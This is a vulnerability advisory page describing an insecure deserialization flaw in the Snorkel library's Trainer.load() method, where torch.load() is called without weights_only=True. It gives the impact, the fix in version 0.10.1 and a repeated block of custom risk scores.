Primary

Context

Snorkel Library Insecure Deserialization Vulnerability in Trainer.load() Method Allowing Arbitrary Code Execution

Vulnerability

A vulnerability allowing insecure deserialization has been identified in the Snorkel library, affecting versions through 0.10.0. The issue arises in the Trainer.load() method, where model checkpoint files are loaded using torch.load() without the security-restrictive weights_only=True parameter. This oversight enables the deserialization of arbitrary Python objects via the Pickle module. A remote attacker could exploit this vulnerability by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded using the vulnerable method.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the system where the vulnerable Snorkel library is used.

Remediation

Users can update to Snorkel version 0.10.1 or later, where this vulnerability has been addressed.

Added: May 12, 2026, 4:27 PM

Updated: May 12, 2026, 4:27 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

6.0

remediation

0.0

relevance

8.1

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

6.0

remediation

0.0

relevance

8.1

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Snorkel Library Insecure Deserialization Vulnerability in Trainer.load() Method Allowing Arbitrary Code Execution

Vulnerability

Impact

Remediation

Affected Products

snorkel-team snorkel

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating